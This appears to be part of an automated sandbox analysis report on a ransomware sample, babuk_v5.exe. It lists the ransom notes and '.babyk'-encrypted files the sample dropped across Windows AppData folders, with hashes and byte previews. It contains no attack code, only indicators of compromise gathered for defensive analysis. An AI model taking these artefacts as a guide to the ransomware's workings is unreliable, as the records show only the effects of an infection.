                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.525955071459524
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlndagB8KWHZPP1DTmi1KnDuIm8V7NZ0rzZ9AUdq+6dcbdEjvumLI/lGNLUxNvEE:NalJRP1DTV1KTm8V7Nyd9AEOcJEjWmL2
                                                                            MD5:7DC75F05EDB08691D10E54B68106C329
                                                                            SHA1:324ACA9AF07C6BDBDF9E89F94D07E631AF26AEA7
                                                                            SHA-256:F6B76BF659A278FC7DF87FF3051AE9F0970B8AF3DC736513D8F5BAAF5D1BF68B
                                                                            SHA-512:AE133E2E3855629F416935ADE5364C2E1E513C27850A71E246B75BB6DF9B3E7E625D67788A97AD295DB2E5C8E90F569CA1F7D45BE3FE795EB272B0F09AD74926
                                                                            Malicious:false
                                                                            Preview: ....k-7>A.B...X.k... ..D5.Jj.$..&..5......!A./....._..Y.mC.p.Vw.h.F....4h.i..UA......4.T.}-x./.....v...../">.T$.@.FJ.....?.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.97774844641408
                                                                            Encrypted:false
                                                                            SSDEEP:192:LSZv3hu5gtYyFioC36dzLxyjXR2EsEf2NVVPRlObS00Cx:LIYxOE69AjXRFsEf2N3Pn900I
                                                                            MD5:8ED03C1C27B0AA2F330B29A9FBFC9CBB
                                                                            SHA1:6E59533CAC678489CA059C7AB81F43333B885715
                                                                            SHA-256:F03E7DA355A562EFC58FE80A6990C902D7126A5C27BF4C1DE940E90B7CF4EE30
                                                                            SHA-512:7133C4D0B1F6DF21CCDD08B1963E7CC950F36E6D9CF9E33C9942A514ADCB7B3C31C18F1A2E314FA034C4A8B7A39F1E839E1BE66C5B50C2A4F89AF2FA0538F74C
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.55099558393286
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl9WacQDLbuueaqQIS6+338HtQDHbAZ06nNAl/cNLUxNvEEn:NtcQK36X6/tQDEZ08At8L0vtn
                                                                            MD5:D4EEE500EB4B716FC54BB998765EC4CC
                                                                            SHA1:AC3F4986AA5E75E39F3776966197D29EED3596CE
                                                                            SHA-256:8382435AC35FA47A4D8BE0260CD86C10A6C714796F474B578588D91319DAD878
                                                                            SHA-512:AFD9722E8318D93BF25828463095FFCAAAB24DF06457177C90A39182B92843F73305C70643AB440B79835BCFFE355377EBDB72080F524179CBD408DF10147B95
                                                                            Malicious:false
                                                                            Preview: ....~[.)f........h..}.~y. LJ....cwxPY.D$..&.....YuF.<.....%2.q..Io.Rj.m.L.5P...Sb8=.0x.nY.I).c9..s.,..2..F.....<.....Q$gI..fe....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977948422572273
                                                                            Encrypted:false
                                                                            SSDEEP:192:DeovEj+RDMZ2WE7G0WTosp294i9GM6qILoglceaGGdpLJEVI:yov7UZLox4iQZqcbGdp6VI
                                                                            MD5:ECF31E82B331448DD25BA3EE54CCA239
                                                                            SHA1:366FFAB5A653DFBFE8A122E14DF76D56961EB01E
                                                                            SHA-256:EF749830CDF88FDF27BF98E9864898137A99EBFCC87EBD5D189C9F19A293CE96
                                                                            SHA-512:E6DC4B09232F4859EF6FFB0CE00483B6B59BAA85FE16556E950B850A9C9E2E2F63532DDEC2BE64D5901697CA49ADF709645300399A54C9DB52498C40BF557BCB
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
